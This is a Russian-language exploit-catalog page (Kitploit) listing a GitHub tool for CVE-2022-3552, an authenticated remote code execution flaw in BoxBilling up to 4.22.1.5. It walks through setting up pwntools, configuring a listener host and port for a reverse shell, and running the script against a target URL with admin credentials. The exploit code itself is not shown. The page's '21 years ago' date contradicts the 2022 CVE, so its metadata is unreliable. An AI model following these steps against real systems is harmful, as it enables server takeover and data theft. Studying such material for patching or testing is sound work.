Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-3552 — CVE-2022-3552 RCE with detailed exploitation steps | Kitploit
Инструменты/GitHubGitHub/bakalmode/cve-2022-3552
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubbakalmode/cve-2022-3552

CVE-2022-3552

CVE-2022-3552 RCE with detailed exploitation steps

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-3552

Для эксплуатации уязвимости в BoxBlilling версия должна быть: "BoxBilling<=4.22.1.5", и вам потребуются действительные учётные данные администратора.

Если у вас есть описанная ситуация, вот шаги, которые необходимо выполнить, чтобы получить желанный RCE:

Создайте виртуальное окружение Python (Linux)

  • root@kitploit:~
     python3 -m venv .venv
    
  • root@kitploit:~
     source .venv/bin/activate
    

Теперь установите библиотеку pwntools

  • root@kitploit:~
     pip3 install pwntools
    

Если она жалуется на отсутствующие зависимости, возможно, потребуется установить некоторые системные пакеты:

  • root@kitploit:~
     sudo apt update
    
  • root@kitploit:~
     sudo apt install python3-pwntools
    

В коде есть несколько строк, требующих настройки, — это строки, определяющие IP-адрес lhost и порт, на который вы планируете принимать шелл.

изображение

Если вы всё сделали правильно, теперь вы сможете запустить эксплойт и получить шелл! (-d = цель, -u = действительный email администратора, -p = пароль действительного администратора)

  • root@kitploit:~
     python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE
    
Скачать инструмент